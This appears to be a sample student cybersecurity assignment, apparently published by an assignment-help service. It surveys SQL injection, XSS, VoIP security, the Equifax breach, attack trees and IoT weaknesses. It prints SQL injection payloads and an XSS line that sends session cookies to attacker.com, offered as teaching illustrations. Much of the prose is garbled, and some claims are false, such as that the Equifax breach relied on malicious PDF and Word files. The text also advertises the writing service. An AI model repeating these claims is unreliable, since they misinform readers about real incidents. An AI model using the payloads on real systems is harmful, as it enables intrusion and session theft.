Introduction
Cybersecurity has become a critical concern for organizations and individuals due to the increasing number of cyber threats targeting web applications, networks, IoT devices, and communication systems. Vulnerabilities such as SQL injection, Cross-Site Scripting (XSS), VoIP exploits, and malicious file-based attacks expose sensitive data and can lead to severe financial and operational consequences. This assignment explores the common types of security flaws, their potential impact, and the strategies to mitigate these risks, providing a comprehensive understanding of modern cybersecurity challenges.
Activity 5.1: SQL Injection Vulnerabilities
SQL Injection is a highly dangerous web application flaw originating from inadequate input validation whereby the attacker is able to manipulate SQL statements in order to get unauthorized access to the database. This means the penetrative type of attack targeted at exploiting the input flaws leading to violation of secured information, unauthorized alteration or total control of a given system. Some of the forms of the SQL injection include unauthorized access and retrieval of data entered by the attacker. For instance, a trivial payload like ‘ OR ‘1’=’1’ can be used for remote login by manipulating forms that check user credentials, in this case, the payload will always produce true. Another limitation of the testing was that it did not reduce effectiveness of simple input such as ‘; DROP TABLE users; -- ‘ focused on erasing tables because of basic security measures (Mallick and Nath, 2024). However, the technique ‘ OR 1=1 -- manipulated past the login screens, which shows that the system admission had inadequate sanitation strategies. Some other form of complex and efficient SQL injection is the time base blind SQL injection to acquire data surreptitiously. For instance, the payload AND IF(SUBSTRING((SELECT DATABASE()),1,1)='t’,SLEEP(5),0) condition checks whether a statement is true and if it is, it waits for a specific period in order to guess the structure of the server. This method is very useful against systems that do not notify their user on the occurrence of any error and thus it is possible to proactively steal data. To protect from SQL injection, prepared statements and parameterized queries should be used as they set SQL code apart from the user inputs (Phillips et al., 2023). Other ways that can be used to reduce risks include; White listing, escaping the duly characterized special characters, and mini mum privilege when creating database accounts. The need to carry out security audits and the adoption of WAF implemented to help in checking rogue and blocking all nasty requests add on the fight against SQL injection exploits. Appropriate security measures can in great extent prevent such attacks and protect valuable data.
Activity 5.2: Vulnerability Impact - Cross-Site Scripting (XSS)
Cross-Site Scripting or XSS is a critical vulnerability of web applications through which an attacker is capable of injecting HTML and script code into otherwise legitimate websites. Originally noticed towards the end of the 1990 and beginning of 2000, XSS targets input validation and output encoding systems in web applications. It mainly focuses in browser rather than the web application and hence turns out to be a tool for attackers who want to exploit user sessions, spoof website, or inject malware. As to the types of XSS attacks, there are three of them: Stored or Persistent, Reflected, and DOM-based. The former can be further divided into reflected and stored XSS attacks; the former involves executing scripts that are only temporarily inserted on a target server such as in the comment sections or message boards while the latter limit their operations to permanently stored scripts on the specified server (Ibrahim, 2022). The virus runs a script in the targeted webpage each time other users enter it without their awareness. For instance, an attacker may post comment like <script>document.location=’http://attacker.com?cookie=’+document.cookie</script> that captures and transfer users’ session cookies to the attacker’s server to hijack the sessions. Reflected XSS occur when the scripts are returned by a web application and instantly displayed on the user’s browser through URLs. This type of cross-site scripting is normally used through mail fraud or other links which look genuine. For instance, a link such as http://vulnerable-site.com/search?q=<script>alert(‘Hacked!’)</script> would run the script if the pages of the application are not filtered, and then it will simply display the search results. It is widely used in most of the times to perform phishing attack and credential harvesting by making users to click links that appear to be genuine.
DOM Xss attacks the client-side applications and focuses on altering the DOM tree structure of the webpage to introduce unauthorized scripts. This variant does not include server-side vulnerabilities of stored and reflected XSS and that is why it is much more difficult to combat it (Dhayanidhi, 2022). For example, websites that use JavaScript to print user input to the DOM without sanitization may expose a script injection vulnerability that an attacker can use to modify the page to display fake login forms, for instance, in an effort to obtain the credentials of the users. To solve the XSS problem, developers should strictly validate all the inputs and encode all the outputs. This method implies limiting the input data in such a manner that only data with defined input format or range is entered in fields such as search boxes. Output encoding also keeps any issues from appearing out of exciting characters on a webpage thereby changing them into a form that will not cause a problem. Also, there is an option of Content Security Policy (CSP) headers to limit the sources through which scripts can be run; thus even when injected; they cannot run. Other protective action that can be taken includes, disabling of inline JavaScript, setting cookies to use HTTP-only since they cannot be accessed via JavaScript, and performing regular security review and fixing cross-site scripting vulnerabilities. As seen above if these measures are implemented during the development phase of a program, there shall be decreased vulnerability to cross site scripting attacks and even user’s privacy shall be preserved.
Activity 5.3: Protecting VoIP Communication
VoIP technology refers to a technology where by calls are made through Internet protocols using the Session Initiation Protocol (SIP) or the Secure Real-time Transport Protocol (SRTP) among others. This has made it possible for the users to conduct their business at a cheaper price and this has boosted its popularity among the users (Bernard, 2022). However, its enthusiasm has also led to new forms of vulnerabilities in VoIP such as; eavesdropping, replay attack, caller ID forging, denial of service (DoS) and toll fraud. They majorly include poor adoption of encryption standard, utilization of insecure protocols and flawed network settings. One of the most common threats that affect VoIP is eavesdropping, where the intruder listens to the flow of voice traffic in an attempt to gain proofs like personal conversations, account details, or organizational information. This is because when voice packets are transmitted without sufficient encryption, this is achievable. To work around this kind of risk, the use of Transport Layer Security, TLS for the SIP signaling and SRTP for the media stream is recommended. TLS makes sure that the superficial data of the communication between the VoIP endpoints is secure by making sure that SIP messages cannot be intercepted or modified by attackers. On the other hand, SRTP protects the voice data itself to ensure that in case it is intercepted, it is not comprehensible by the third parties.
The other risk is that of VoIP services’ interruption due to various means such as sending massive traffic to overwhelm the services or exposure of peculiarities of the used protocols. Specifically, the availability of a service can be threatened through attacks on the SIP endpoints or SIP proxy servers (Iakovakis et al., 2021). It is erroneous to state that ‘There are no network security measures that can prevent such attacks’ because utilizing firewalls with ACLs to block the traffic, and establishing IDS to alert of such patterns are genuine ways of safeguarding the system. Similarly rate limiting and deep packet inspection (DPI) is instrumental in the assessment of traffic for a pre-conception that it bears illegal traffic before causing any effect on the network. Security is one of the main concerns in the growth of VoIP service, which includes the issues of authentication, and access control. In this case, use of strong passwords for SIP accounts especially in conjunction with MFA results in the reduction of account compromise. For instance, using a onetime password along with the usual username and password, the attackers cannot even get into the SIP endpoints even if they have obtained the login details (Patel et al., 2023). Other measures which should be employed towards minimizing attacks on SIP accounts include limiting the number of login attempts as well as employing the use of restrictions based on IP address.
The VoIP system is also at the risk or caller ID spoofing where the caller information is altered or disguised by the attackers. This may cause phishing scam or toll frauds. Two standards namely, Secure Telephony Identity Revisited (STIR) and Signature-based Handling of Asserted Information Using toKENs (SHAKEN) are the protocols that can assist in verifying the authenticity of caller ID details and prevent spoofing (Derrick, 2023). These protocols utilize certificates to ensure that the number displayed on the caller ID is authentic hence minimizing the possibilities of an attacker achieving in his/her pursuits of social engineering. Patch management is one of the crucial actions used in VoIP security operations. New VoIP technologies have pointed out that it is always wise to upgrade the software and firmware in order to fix such areas that hackers and unauthorized people know to expose due to their previous exploits. The ability to extend NAT can improve security by hiding internal IP addresses, the attackers find it challenging to locate a specific machine to attack. Training is also another factor since most of the VoIP attacks stem from social engineering methods. In general, IT managers should increase awareness of the potential threats of phishing attacks and specific guidelines for avoiding links to fake web pages and other unusual activities to decrease the probability of VoIP-based threats. It is possible however to perform security audits and penetration testing that would assist organizations to discover any holes in the VoIP systems.
Activity 5.4: Cybersecurity Flaws in Equifax - Malicious Files
One of the notable data breaches that occurred in 2017 involved Equifax, which is a credit monitoring agency that saw its clients’ details of 143 million compromised. One of the notable elements of this intrusion was the use of PDF and DOC files with malicious intents. It was attempted by exploiting specific flaws in Adobe Reader and Microsoft Word to run code by the attackers as soon as the targets opened genuine appearing documents (Zaoui et al., 2024). Using JavaScript in PDF or taking advantage of Macros in Word files, the attackers were able to have full access of the targeted machines, steal information and even bypass firewalls and all other conventional security parametres. For instance, it was identified that the attachment can contain JavaScript in PDFs for overlaying and phantom pop-ups with no consent or Macro-enabled Word document which downloads and runs malicious files independently. Since, these documents did not pose any threat to firewalls and the systems used by email security they reached the victims. This was achieved by leveraging on two assumptions, which are the faith that was placed on document formats and the fact that the attack was carried out as an application. To avoid such risks, therefore, they should embrace sandboxing. It helps in executing documents in parallel in a separate area where no harm can be caused to the governed system. The absence of these documents in the context of our relationship presents an additional protection disabling of macros by default in Microsoft Office also reduces the possibility of running of harmful scripts automatically. Also, frequently updating the application used to open documents and its support tools effectively deals with other known weaknesses that the attackers can take advantage of. File integrity monitoring (FIM) is also important; it checks for improper changes in files and/or applications that suggest incursions. Informing the user on the adverse effects of enabling macros and opening attachments from other people also minimizes the chances of attacking the device. Through the use of these measures, it becomes relatively easier to counter document-based threats within organizations.
Activity 5.7: Pen-Testing Plan (Attack Tree) for an Organization
Pen-testing is also referred to as a structured procedure of identifying vulnerabilities in organizations’ systems through an imitation of a real-life attack. This approach is effective because using an attack tree to create this plan allows one to have a structured way of presenting the potential risks a system or application will face on the network, applications, or via social engineering attempts. In the case of an organization that has over 100 servers, it is important to develop an attack tree in order to identify risks and to check effectiveness of the existing security measures. This also puts light on existing vulnerabilities and also determines the capability of an organisation with regards to multiple, layered attacks. The attack tree contains the network-based attack branch, which is based on the premises of exploiting communication channel, protocol, and configuration issues. Some of the common techniques of the malicious programs include ARP spoofing, Port Scanning, SMB vulnerabilities, and DNS poisoning. For instance, ARP spoofing, enables the attacker to simulate himself a legitimate MAC address, hence gain access to the network and alter data or fully gains the whole different access to a network, in turn accessing, changing data. Thus, the attacks based on SMB vulnerabilities allow performers to work with remote code or files for tradition, as it was using the EternalBlue vulnerability during the attacks with WannaCry ransomware. Measures of protection include the use of network segmentation to minimize navigation throughout the network and the placement of IDS to look for patterns characteristic of a threat. Furthermore, there is always the possibility of intercepting such messages, but it is still possible to implement IPsec, and secure VPNs will encrypt the internal messages.
Figure 1: Attack Tree
The application based attack branch is designed to attack Web applications and software services, particularly, SQL injection, cross-site scripting, remote file inclusion and buffer overflow. For example, in SQL injection, the attacker gets a chance to inject his own commands into web forms owing to weak input validation and control, therefore gain unauthorized access to the database or delete some records. XSS is an attack type that allows hackers to place scripts on the website that they intend to bring on other sites; these scripts may put a cookie or hijack the user’s sessions. In order to reduce these risks, use of Web Application Firewall (WAF), input validation and output encoding, security patches and code review are recommended. They assist in detecting and preventing possibly destructive traffic, clean user inputs, and also addresses apparent flaws in Web applications, thereby improving the security of Web apps. The social engineering attack branch concerns its efforts on targeting the human aspect with intent to deceive in order to gain access to restricted technology areas. There is phishing, spear-phishing, pretexting, and baiting and other similar practices, which are crafted to trick employees into revealing sensitive information. For instance, profound emails that look like they are from a reputable source will force personnel or employees to give away login details or download vicious software. While spear-phishing is a form of phishing which involves the use of information to make the link more credible, Some of these are security training in order to promote awareness among its employees that phishing is real and what they should do in cases of receiving an abnormal message, the use of MFA to minimize cases of unauthorized access, and filtering emails as a way of preventing any phishing attempts. In practice, the adversary may be employing other attack vectors simultaneously or consecutively to increase the damage that is being inflicted to its target. There might be opportunities from a successful phishing attack to gain initial foothold after which the attacker exploits a network vulnerability for further movement within the organization. In the same way, only tying SQL injection with other privileges escalation boosts it to the full control of the system. This shows that there has to be a layered approach to defense since attackers target various levels in an attack tree. Some of the solutions that can be adopted as best practices includes; Adopting a Zero Trust Architecture that requires every access be authenticated The restricting of the application’s user privileges as a concept known as the Principle of Least Privilege; The integration of DAST and SAST, which are tools that perform testing for application vulnerabilities.
Activity 5.8: Vulnerabilities in IoT Devices
IoT devices have become common in today’s society and have influenced various fields ranging from homes, health, industries among others. However, this survey has brought about an abrupt increase in the Internet of Things (IoT) deployments in various companies and organizations because of factors such as poor authentication protocols, un-updated firmware, and compromised communication standards (Gregg and Santos, 2022). A large number of IoT devices are created with focus on the ease of usage and low costs, leaving the question of security rather weak. These devices have become the perfect gem for hackers who may wish to penetrate into the system in order to retrieve data, create a botnet, among other vices. Without doubt, one of the most famous IoT attacks was the Mirai botnet attack with the help of which DDoS attacks were conducted in 2016 using default login credentials left in IoT devices. To do this, Mirai looked for devices with default logins such as those used by some IP cameras and routers and infected thousands of devices across the globe. Considering these were first exploited, the devices became transformed into bots that flooded various sites with traffic, adversely affecting service delivery considerably. This attack underlined the threat that weak identification presents and especially the call to establish new or complex passwords, and to disable default accounts in IoT devices. The other main vulnerability that affects IoT ecosystems is the regularly updated firmware. Unknowingly, many of the devices are not updated automatically and remain highly vulnerable to already existing exploits. These forms of weaknesses involve attack that make it easy for the intruders to penetrate into the control and command the targeted device or extract information from it. For instance, the lack of upgrading firmware in routers and internet protocol cameras has led to them to be used in distribution of malware or as a platform for MITM attacks. To minimize such risks, it is important to carry out the firmware updates and to install patch management systems. There are several security measures manufacturers should also implement to include the proper boot mechanisms that ensure that only verified firmware is loaded into the devices.
There are many threats which distress the security of IoT and some of them are as follows: Most of the above protocols such as MQTT (Message Queuing Telemetry Transport), which is commonly used for IoT device communication, are not encrypted and secured by default. This suggest that these vulnerabilities can be abused by attacker to eavesdrop, manipulate or inject evil packets in the communication between the devices. Alas, one of the most widely used standards of wireless communication Zigbee was exploited by hackers in one of the attacks. In 2020, a security researchers found a vulnerability that enables them to take a full control of various connected devices including lights, locks, and thermostats (Bhunia et al., 2025). To achieve confidentiality in IoT, there is a need to incorporate encryption standards like the Transport Layer Security (TLS), and incorporation of mutual authentication among IoT devices that may lead to unauthorized acts or alteration of data content. This is absolutely applicable in the current IoT technology to ensure that devices are properly authenticated to boost security. This entails the following measures this entails ensuring that infrastructure for Public Key Infrastructure (PKI) is put in place for the issues of certificates which will enable the access of the network only by trusted devices. Furthermore, using the concept of network segmentation will contribute in minimizing the effects of contaminated devices through separating IoT traffic with other essential segments (Asituha, 2024). For instance, using VLAN for the IoT devices prevents the attackers to move laterally since the breach is confined to that segment of the entire network. Another important issue is also the privacy of the data being processed by the IoT devices, for instance, data relating to health, surveillance cameras. The data must be encrypted both during their transmission and storage and it means that its interception will not pose a threat due to its encrypted format that can only be decrypted through the right keys. Edge computing can also help as a part of the solution as it does not transmit data for analysis to distant cloud servers where it may be intercepted and exposed.
Native Assignment Help provides expert-guided Assignment Help UK for students struggling with complex cybersecurity and networking topics. Our academic specialists deliver well-structured, plagiarism-free solutions aligned with UK university standards. With Native Assignment Help, students gain clarity, accuracy, and confidence in every Assignment Help submission.
Reference List
Journals
Mallick, M.A.I. and Nath, R., 2024. Navigating the cyber security landscape: A comprehensive review of cyber-attacks, emerging trends, and recent developments. World Scientific News, 190(1), pp.1-69.
Phillips, A., Ojelade, I., Taiwo, E., Obunadike, C. and Oloyede, K., 2023. Cyber-Security Tactics in Mitigating Cyber-Crimes: A Review and Proposal. Int. J. Cryptogr. Inf. Secur. IJCIS, 13.
Ibrahim, H., 2022. A review on the mechanism mitigating and eliminating internet crimes using modern technologies: Mitigating internet crimes using modern technologies. Wasit Journal of Computer and Mathematics Science, 1(3), pp.50-68.
Dhayanidhi, G., 2022. Research on IoT threats & implementation of AI/ML to address emerging cybersecurity issues in IoT with cloud computing.
Asituha, E., 2024. A comprehensive survey of performance, security and privacy issues in the network interface layer of the TCP/IP.
Bernard, S., 2022. Strategies to Secure a Voice over Internet Protocol Telephone System (Doctoral dissertation, Walden University).
Iakovakis, G., Xarhoulacos, C.G., Giovas, K. and Gritzalis, D., 2021. Analysis and classification of mitigation tools against cyberattacks in COVID‐19 era. Security and Communication Networks, 2021(1), p.3187205.
Patel, A.U., Williams, C.L., Hart, S.N., Garcia, C.A., Durant, T.J., Cornish, T.C. and McClintock, D.S., 2023. Cybersecurity and information assurance for the clinical laboratory. The journal of applied laboratory medicine, 8(1), pp.145-161.
Derrick, T.O.M.A.N.I., 2023. Analysis of vulnerabilities and techniques of attacks of computer systems and networks (Doctoral dissertation, ULK).
Zaoui, M., Yousra, B., Yassine, S., Yassine, M. and Karim, O., 2024. A Comprehensive Taxonomy of Social Engineering Attacks and Defense Mechanisms: Towards Effective Mitigation Strategies. IEEE Access.
Bhunia, S., Blackert, M., Deal, H., DePero, A. and Patra, A., 2025. Analyzing the 2021 Kaseya Ransomware Attack: Combined Spearphishing Through SonicWall SSLVPN Vulnerability. IET Information Security, 2025(1), p.1655307.
Gregg, M. and Santos, O., 2022. CEH Certified Ethical Hacker Cert Guide. Pearson IT Certification.
